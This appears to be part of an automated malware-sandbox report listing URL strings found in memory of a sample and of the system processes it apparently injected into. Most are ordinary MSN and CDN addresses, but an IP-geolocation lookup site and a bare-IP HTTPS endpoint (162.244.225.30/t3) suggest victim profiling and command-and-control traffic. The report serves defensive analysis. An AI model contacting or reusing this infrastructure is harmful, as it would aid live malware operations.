Source: taskhost.exe, 00000013.00000000.536034759.00490000.00000004.00000001.sdmp	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyuliQ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhost.exe, 00000013.00000000.536786673.015C8000.00000008.00000001.sdmp	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzklAJ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhost.exe, 00000013.00000000.536786673.015C8000.00000008.00000001.sdmp	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB46JmN?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhost.exe, 00000013.00000000.536786673.015C8000.00000008.00000001.sdmp	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBGjoVB?h=50&w=50&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: taskhost.exe, 00000013.00000000.536786673.015C8000.00000008.00000001.sdmp	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBIbTiS?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhost.exe, 00000013.00000000.536034759.00490000.00000004.00000001.sdmp	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBK9Hzy?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhost.exe, 00000013.00000000.546269969.01BD8000.00000008.00000001.sdmp	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBO5Geh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhost.exe, 00000013.00000000.546269969.01BD8000.00000008.00000001.sdmp	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPRPvf?h=50&w=50&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: taskhost.exe, 00000013.00000000.546269969.01BD8000.00000008.00000001.sdmp	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhost.exe, 00000013.00000000.536786673.015C8000.00000008.00000001.sdmp	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBSDdmG?h=50&w=50&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: taskhost.exe, 00000013.00000000.536786673.015C8000.00000008.00000001.sdmp	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBTrj40?h=50&w=50&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: taskhost.exe, 00000013.00000000.546269969.01BD8000.00000008.00000001.sdmp	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBUZVvV?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhost.exe, 00000013.00000000.546269969.01BD8000.00000008.00000001.sdmp	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBVBUge?h=50&w=50&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: taskhost.exe, 00000013.00000000.546269969.01BD8000.00000008.00000001.sdmp	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBVQ7lO?h=50&w=50&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: taskhost.exe, 00000013.00000000.536786673.015C8000.00000008.00000001.sdmp	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBWoHwx?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhost.exe, 00000013.00000000.536034759.00490000.00000004.00000001.sdmp	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBih5H?m=6&o=true&u=true&n=true&w=30&h=30
Source: taskhost.exe, 00000013.00000000.546269969.01BD8000.00000008.00000001.sdmp	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBnYSFZ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: explorer.exe, 0000000C.00000002.752929952.00646000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: explorer.exe, 0000000C.00000002.752929952.00646000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: explorer.exe, 0000000C.00000002.752929952.00646000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0)
Source: explorer.exe, 0000000C.00000002.752929952.00646000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: explorer.exe, 0000000C.00000002.752929952.00646000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: explorer.exe, 0000000C.00000002.752929952.00646000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: explorer.exe, 0000000C.00000002.752929952.00646000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: explorer.exe, 0000000C.00000002.752929952.00646000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: taskhost.exe, 00000013.00000000.539359532.00216000.00000004.00000020.sdmp	String found in binary or memory: http://schemas.micro
Source: zhAQkCQvME.exe, 00000000.00000003.453309642.01B5B000.00000004.00000001.sdmp, zhAQkCQvME.exe, 00000005.00000003.475248063.00F2B000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000003.481716807.0177B000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoa
Source: explorer.exe, 0000000C.00000003.535349218.01779000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: explorer.exe, 0000000C.00000003.535349218.01779000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: taskhost.exe, 00000013.00000000.546269969.01BD8000.00000008.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/865af804/webcore/externalscripts/oneTrust/de-
Source: taskhost.exe, 00000013.00000000.546269969.01BD8000.00000008.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
Source: taskhost.exe, 00000013.00000000.536786673.015C8000.00000008.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/a1438951/webcore/externalscripts/oneTrust/ski
Source: taskhost.exe, 00000013.00000000.556852384.00498000.00000008.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/css/3bf20fde-434a1743/directi
Source: taskhost.exe, 00000013.00000000.536786673.015C8000.00000008.00000001.sdmp, taskhost.exe, 00000013.00000000.536034759.00490000.00000004.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/3bf20fde-2923b6c2/directio
Source: taskhost.exe, 00000013.00000000.556852384.00498000.00000008.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/3bf20fde-72257498/directio
Source: taskhost.exe, 00000013.00000000.541041949.01510000.00000004.00000001.sdmp, taskhost.exe, 00000013.00000000.536786673.015C8000.00000008.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: taskhost.exe, 00000013.00000000.536786673.015C8000.00000008.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/44/c08e43.jpg
Source: taskhost.exe, 00000013.00000000.546269969.01BD8000.00000008.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/52/8adb60.jpg
Source: taskhost.exe, 00000013.00000000.536786673.015C8000.00000008.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
Source: taskhost.exe, 00000013.00000000.546269969.01BD8000.00000008.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/81/58b810.gif
Source: taskhost.exe, 00000013.00000000.546269969.01BD8000.00000008.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/95/8bd8bf.jpg
Source: taskhost.exe, 00000013.00000000.536786673.015C8000.00000008.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
Source: taskhost.exe, 00000013.00000000.536786673.015C8000.00000008.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
Source: taskhost.exe, 00000013.00000000.536786673.015C8000.00000008.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA7XCQ3.img?h=16&w=16&m
Source: taskhost.exe, 00000013.00000000.536786673.015C8000.00000008.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA8uJZv.img?h=16&w=16&m
Source: taskhost.exe, 00000013.00000000.546269969.01BD8000.00000008.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAFvutY.img?h=368&w=622
Source: taskhost.exe, 00000013.00000000.546269969.01BD8000.00000008.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAHtTgs.img?h=166&w=310
Source: taskhost.exe, 00000013.00000000.546269969.01BD8000.00000008.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAHtYkG.img?h=166&w=310
Source: taskhost.exe, 00000013.00000000.536786673.015C8000.00000008.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAHtrJ1.img?h=75&w=100&
Source: taskhost.exe, 00000013.00000000.546269969.01BD8000.00000008.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAHuD5P.img?h=75&w=100&
Source: taskhost.exe, 00000013.00000000.546269969.01BD8000.00000008.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAHuFNw.img?h=75&w=100&
Source: taskhost.exe, 00000013.00000000.546269969.01BD8000.00000008.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAHucYP.img?h=75&w=100&
Source: taskhost.exe, 00000013.00000000.536786673.015C8000.00000008.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAHudP8.img?h=75&w=100&
Source: taskhost.exe, 00000013.00000000.536786673.015C8000.00000008.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAHudWM.img?h=75&w=100&
Source: taskhost.exe, 00000013.00000000.536786673.015C8000.00000008.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAHuzRp.img?h=166&w=310
Source: taskhost.exe, 00000013.00000000.536786673.015C8000.00000008.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAHv5DU.img?h=166&w=310
Source: taskhost.exe, 00000013.00000000.536786673.015C8000.00000008.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAHv9aU.img?h=333&w=311
Source: taskhost.exe, 00000013.00000000.536034759.00490000.00000004.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAHvWgM.img?h=166&w=310
Source: taskhost.exe, 00000013.00000000.536786673.015C8000.00000008.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAHvXhQ.img?h=166&w=310
Source: taskhost.exe, 00000013.00000000.536786673.015C8000.00000008.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAHvaL6.img?h=166&w=310
Source: taskhost.exe, 00000013.00000000.546269969.01BD8000.00000008.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAHvwNG.img?h=250&w=300
Source: taskhost.exe, 00000013.00000000.546269969.01BD8000.00000008.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAHwCff.img?h=333&w=311
Source: taskhost.exe, 00000013.00000000.546269969.01BD8000.00000008.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAHwESx.img?h=333&w=311
Source: taskhost.exe, 00000013.00000000.536786673.015C8000.00000008.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAHwGur.img?h=166&w=310
Source: taskhost.exe, 00000013.00000000.536786673.015C8000.00000008.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAHwOoE.img?h=250&w=300
Source: taskhost.exe, 00000013.00000000.546269969.01BD8000.00000008.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAHwR4s.img?h=333&w=311
Source: taskhost.exe, 00000013.00000000.536034759.00490000.00000004.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyuliQ.img?h=16&w=16&m
Source: taskhost.exe, 00000013.00000000.536786673.015C8000.00000008.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzklAJ.img?h=16&w=16&m
Source: taskhost.exe, 00000013.00000000.536786673.015C8000.00000008.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB46JmN.img?h=16&w=16&m
Source: taskhost.exe, 00000013.00000000.536786673.015C8000.00000008.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBGjoVB.img?h=50&w=50&m
Source: taskhost.exe, 00000013.00000000.536786673.015C8000.00000008.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBIbTiS.img?h=16&w=16&m
Source: taskhost.exe, 00000013.00000000.536034759.00490000.00000004.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBK9Hzy.img?h=16&w=16&m
Source: taskhost.exe, 00000013.00000000.546269969.01BD8000.00000008.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBO5Geh.img?h=16&w=16&m
Source: taskhost.exe, 00000013.00000000.546269969.01BD8000.00000008.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPRPvf.img?h=50&w=50&m
Source: taskhost.exe, 00000013.00000000.546269969.01BD8000.00000008.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
Source: taskhost.exe, 00000013.00000000.536786673.015C8000.00000008.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBSDdmG.img?h=50&w=50&m
Source: taskhost.exe, 00000013.00000000.536786673.015C8000.00000008.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBTrj40.img?h=50&w=50&m
Source: taskhost.exe, 00000013.00000000.546269969.01BD8000.00000008.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBUZVvV.img?h=16&w=16&m
Source: taskhost.exe, 00000013.00000000.546269969.01BD8000.00000008.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVBUge.img?h=50&w=50&m
Source: taskhost.exe, 00000013.00000000.546269969.01BD8000.00000008.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVQ7lO.img?h=50&w=50&m
Source: taskhost.exe, 00000013.00000000.536786673.015C8000.00000008.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBWoHwx.img?h=27&w=27&m
Source: taskhost.exe, 00000013.00000000.536034759.00490000.00000004.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBih5H.img?m=6&o=true&u
Source: taskhost.exe, 00000013.00000000.546269969.01BD8000.00000008.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnYSFZ.img?h=16&w=16&m
Source: explorer.exe, 0000000C.00000002.752929952.00646000.00000004.00000020.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: explorer.exe, 0000000C.00000002.752929952.00646000.00000004.00000020.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: zhAQkCQvME.exe, 00000000.00000002.470874320.006C3000.00000004.00000020.sdmp, zhAQkCQvME.exe, 00000001.00000000.447916030.0049E000.00000002.00020000.sdmp, jkfkdm.exe, 00000002.00000000.469403714.0049E000.00000002.00020000.sdmp, zhAQkCQvME.exe, 00000005.00000000.472415467.0049E000.00000002.00020000.sdmp, jkfkdm.exe, 00000006.00000000.473336388.0049E000.00000002.00020000.sdmp, jkfkdm.exe, 00000007.00000000.476350633.0049E000.00000002.00020000.sdmp, jkfkdm.exe, 0000000E.00000000.483322855.0049E000.00000002.00020000.sdmp, jkfkdm.exe, 00000011.00000000.509911255.0049E000.00000002.00020000.sdmp, jkfkdm.exe, 00000012.00000000.513021961.0049E000.00000002.00020000.sdmp	String found in binary or memory: http://www.flos-freeware.ch
Source: zhAQkCQvME.exe, 00000000.00000002.470874320.006C3000.00000004.00000020.sdmp, zhAQkCQvME.exe, 00000001.00000000.447916030.0049E000.00000002.00020000.sdmp, jkfkdm.exe, 00000002.00000000.469403714.0049E000.00000002.00020000.sdmp, zhAQkCQvME.exe, 00000005.00000000.472415467.0049E000.00000002.00020000.sdmp, jkfkdm.exe, 00000006.00000000.473336388.0049E000.00000002.00020000.sdmp, jkfkdm.exe, 00000007.00000000.476350633.0049E000.00000002.00020000.sdmp, jkfkdm.exe, 0000000E.00000000.483322855.0049E000.00000002.00020000.sdmp, jkfkdm.exe, 00000011.00000000.509911255.0049E000.00000002.00020000.sdmp, jkfkdm.exe, 00000012.00000000.513021961.0049E000.00000002.00020000.sdmp	String found in binary or memory: http://www.flos-freeware.ch.JNo
Source: zhAQkCQvME.exe, 00000000.00000002.470976903.015F7000.00000004.00000040.sdmp, zhAQkCQvME.exe, 00000005.00000002.488530565.00EF0000.00000004.00000001.sdmp, explorer.exe	String found in binary or memory: http://www.ip-adress.com
Source: explorer.exe, 0000000C.00000002.752804516.005A3000.00000004.00000020.sdmp	String found in binary or memory: http://www.ip-adress.com/
Source: zhAQkCQvME.exe, 00000000.00000002.470976903.015F7000.00000004.00000040.sdmp, zhAQkCQvME.exe, 00000005.00000002.488530565.00EF0000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000003.535349218.01779000.00000004.00000001.sdmp	String found in binary or memory: http://www.ip-adress.comIP
Source: taskhost.exe, 00000013.00000000.541041949.01510000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: taskhost.exe, 00000013.00000000.549280591.015B0000.00000004.00000001.sdmp, taskhost.exe, 00000013.00000000.541041949.01510000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
Source: explorer.exe, 0000000C.00000002.752804516.005A3000.00000004.00000020.sdmp	String found in binary or memory: https://162.244.225.30/
Source: explorer.exe, 0000000C.00000002.755328696.02450000.00000004.00000001.sdmp, taskhost.exe, 00000013.00000000.551865684.00262000.00000004.00000020.sdmp	String found in binary or memory: https://162.244.225.30/t3
Source: explorer.exe, 0000000C.00000002.752804516.005A3000.00000004.00000020.sdmp	String found in binary or memory: https://162.244.225.30/t3l
Source: explorer.exe, 0000000C.00000002.752804516.005A3000.00000004.00000020.sdmp	String found in binary or memory: https://162.244.225.30/t3rn
Source: explorer.exe, 0000000C.00000002.753929443.0190E000.00000004.00000040.sdmp	String found in binary or memory: https://162.244.225.30:443/t3
Source: zhAQkCQvME.exe, 00000000.00000002.470959957.015D0000.00000004.00000040.sdmp, zhAQkCQvME.exe, 00000001.00000002.452348450.016D0000.00000004.00000040.sdmp, jkfkdm.exe, 00000002.00000002.487446283.01550000.00000004.00000040.sdmp, zhAQkCQvME.exe, 00000005.00000002.485333119.00AA0000.00000004.00000040.sdmp, jkfkdm.exe, 00000006.00000002.478496840.01600000.00000004.00000040.sdmp, jkfkdm.exe, 00000007.00000002.493272674.01630000.00000004.00000040.sdmp, explorer.exe, 0000000C.00000002.753873444.018E0000.00000004.00000040.sdmp, jkfkdm.exe, 0000000E.00000002.491326133.015A0000.00000004.00000040.sdmp, jkfkdm.exe, 00000011.00000002.518700844.016D0000.00000004.00000040.sdmp, jkfkdm.exe, 00000012.00000002.517136665.01490000.00000004.00000040.sdmp, taskhost.exe, 00000013.00000002.759522715.028D0000.00000004.00000040.sdmp, dwm.exe, 00000015.00000002.761332062.01B70000.00000004.00000040.sdmp	String found in binary or memory: https://9i43.gifabc11application/x-shockwave-flash
Source: explorer.exe, 0000000C.00000003.535537778.01779000.00000004.00000001.sdmp, taskhost.exe, 00000013.00000002.757799892.015D0000.00000040.00000001.sdmp, dwm.exe, 00000015.00000002.760410563.013B0000.00000040.00000001.sdmp	String found in binary or memory: https://Content-LengthHostHTTP/1.1.text
Source: taskhost.exe, 00000013.00000002.757756422.015C0000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/__media__/js/util/nrrV4251.js
Source: taskhost.exe, 00000013.00000002.757756422.015C0000.00000004.00000001.sdmp, taskhost.exe, 00000013.00000000.541041949.01510000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: taskhost.exe, 00000013.00000002.757756422.015C0000.00000004.00000001.sdmp, taskhost.exe, 00000013.00000000.541041949.01510000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: taskhost.exe, 00000013.00000000.542810870.01BD0000.00000004.00000001.sdmp	String found in binary or memory: https://cvision.media.net/new/300x300/2/215/35/104/aa3002d0-2753-44c0-81c6-b4a1cc6b295a.jpg?v=9
Source: taskhost.exe, 00000013.00000000.542810870.01BD0000.00000004.00000001.sdmp	String found in binary or memory: https://cvision.media.net/new/300x300/2/249/134/240/448cf229-1ded-4c2a-8cfe-21be5d0e9c41.jpg?v=9
Source: taskhost.exe, 00000013.00000000.542810870.01BD0000.00000004.00000001.sdmp	String found in binary or memory: https://cvision.media.net/new/300x300/2/29/52/32/f97e093e-8f0a-46a8-8138-df7da8ff5790.jpg?v=9
Source: taskhost.exe, 00000013.00000000.542810870.01BD0000.00000004.00000001.sdmp	String found in binary or memory: https://cvision.media.net/new/300x300/3/74/46/90/d639d099-11d6-4d90-82f4-691ae09aeb85.jpg?v=9
Source: taskhost.exe, 00000013.00000000.542810870.01BD0000.00000004.00000001.sdmp	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
Source: taskhost.exe, 00000013.00000000.542810870.01BD0000.00000004.00000001.sdmp	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE2MMCc?ver=931d&q=90&m
Source: taskhost.exe, 00000013.00000000.542810870.01BD0000.00000004.00000001.sdmp	String found in binary or memory: https://linkmaker.itunes.apple.com/assets/shared/badges/de-de/appstore-lrg.svg
Source: taskhost.exe, 00000013.00000002.757756422.015C0000.00000004.00000001.sdmp	String found in binary or memory: https://logincdn.msauth.net/16.000/MeControl_c9aw5DbuWFl6vX_Fomxwrw2.js
Source: taskhost.exe, 00000013.00000000.542810870.01BD0000.00000004.00000001.sdmp	String found in binary or memory: https://mem.gfx.ms/meversion?partner=RetailStore2&market=en-us&uhf=1
Source: taskhost.exe, 00000013.00000000.542810870.01BD0000.00000004.00000001.sdmp	String found in binary or memory: https://mem.gfx.ms/scripts/me/MeControl/10.19256.4/en-US/meBoot.min.js
Source: taskhost.exe, 00000013.00000000.542810870.01BD0000.00000004.00000001.sdmp	String found in binary or memory: https://mem.gfx.ms/scripts/me/MeControl/10.19256.4/en-US/meCore.min.js
Source: taskhost.exe, 00000013.00000002.757756422.015C0000.00000004.00000001.sdmp	String found in binary or memory: https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/css/optanon.c
Source: taskhost.exe, 00000013.00000002.757756422.015C0000.00000004.00000001.sdmp	String found in binary or memory: https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/images/cookie
Source: taskhost.exe, 00000013.00000000.542810870.01BD0000.00000004.00000001.sdmp	String found in binary or memory: https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.png
Source: explorer.exe, 0000000C.00000002.752929952.00646000.00000004.00000020.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: explorer.exe, 0000000C.00000002.752804516.005A3000.00000004.00000020.sdmp	String found in binary or memory: https://wh.ip-adress.com/c
Source: explorer.exe, 0000000C.00000002.752804516.005A3000.00000004.00000020.sdmp	String found in binary or memory: https://wh.ip-adress.com/r1
Source: explorer.exe, 0000000C.00000002.752804516.005A3000.00000004.00000020.sdmp	String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: explorer.exe, 0000000C.00000002.752804516.005A3000.00000004.00000020.sdmp	String found in binary or memory: https://www.google.com/maps/embed/v1/view?key=AIzaSyDtXbKhM0BYZn5-zkO-6b1E8DE6UG9vMbo&center=47.3925
Source: explorer.exe, 0000000C.00000002.752804516.005A3000.00000004.00000020.sdmp	String found in binary or memory: https://www.ip-adress.com/
Source: explorer.exe, 0000000C.00000002.752804516.005A3000.00000004.00000020.sdmp	String found in binary or memory: https://www.ip-adress.com/N
Source: explorer.exe, 0000000C.00000002.752804516.005A3000.00000004.00000020.sdmp	String found in binary or memory: https://www.ip-adress.com/about
Source: explorer.exe, 0000000C.00000002.752804516.005A3000.00000004.00000020.sdmp	String found in binary or memory: https://www.ip-adress.com/advertising
Source: explorer.exe, 0000000C.00000002.752804516.005A3000.00000004.00000020.sdmp	String found in binary or memory: https://www.ip-adress.com/contact
Source: explorer.exe, 0000000C.00000002.752804516.005A3000.00000004.00000020.sdmp	String found in binary or memory: https://www.ip-adress.com/glossary/
Source: explorer.exe, 0000000C.00000002.752804516.005A3000.00000004.00000020.sdmp	String found in binary or memory: https://www.ip-adress.com/ip-address-distance
Source: explorer.exe, 0000000C.00000002.752804516.005A3000.00000004.00000020.sdmp	String found in binary or memory: https://www.ip-adress.com/ip-address/ipv4/10.234.25.119
Source: explorer.exe, 0000000C.00000002.752804516.005A3000.00000004.00000020.sdmp	String found in binary or memory: https://www.ip-adress.com/ip-address/ipv4/162.159.133.234
Source: explorer.exe, 0000000C.00000002.752804516.005A3000.00000004.00000020.sdmp	String found in binary or memory: https://www.ip-adress.com/ip-address/ipv4/189.239.190.192
Source: explorer.exe, 0000000C.00000002.752804516.005A3000.00000004.00000020.sdmp	String found in binary or memory: https://www.ip-adress.com/ip-address/ipv4/197.80.130.8
Source: explorer.exe, 0000000C.00000002.752804516.005A3000.00000004.00000020.sdmp	String found in binary or memory: https://www.ip-adress.com/ip-address/ipv4/65.25.55.21
Source: explorer.exe, 0000000C.00000002.752804516.005A3000.00000004.00000020.sdmp	String found in binary or memory: https://www.ip-adress.com/ip-address/ipv4/74.50.111.156
Source: explorer.exe, 0000000C.00000002.752804516.005A3000.00000004.00000020.sdmp	String found in binary or memory: https://www.ip-adress.com/ip-address/ipv4/80.187.107.2
Source: explorer.exe, 0000000C.00000002.752804516.005A3000.00000004.00000020.sdmp	String found in binary or memory: https://www.ip-adress.com/ip-address/lookup
Source: explorer.exe, 0000000C.00000002.752804516.005A3000.00000004.00000020.sdmp	String found in binary or memory: https://www.ip-adress.com/ip-to-zip-code
Source: explorer.exe, 0000000C.00000002.752804516.005A3000.00000004.00000020.sdmp	String found in binary or memory: https://www.ip-adress.com/legal-notice
Source: explorer.exe, 0000000C.00000002.752804516.005A3000.00000004.00000020.sdmp	String found in binary or memory: https://www.ip-adress.com/privacy-policy
Source: explorer.exe, 0000000C.00000002.752804516.005A3000.00000004.00000020.sdmp	String found in binary or memory: https://www.ip-adress.com/proxy-checker
Source: explorer.exe, 0000000C.00000002.752804516.005A3000.00000004.00000020.sdmp	String found in binary or memory: https://www.ip-adress.com/proxy-list
Source: explorer.exe, 0000000C.00000002.752804516.005A3000.00000004.00000020.sdmp	String found in binary or memory: https://www.ip-adress.com/reverse-ip-lookup
Source: explorer.exe, 0000000C.00000002.752804516.005A3000.00000004.00000020.sdmp	String found in binary or memory: https://www.ip-adress.com/search
Source: explorer.exe, 0000000C.00000002.752804516.005A3000.00000004.00000020.sdmp	String found in binary or memory: https://www.ip-adress.com/service/ip-location-api
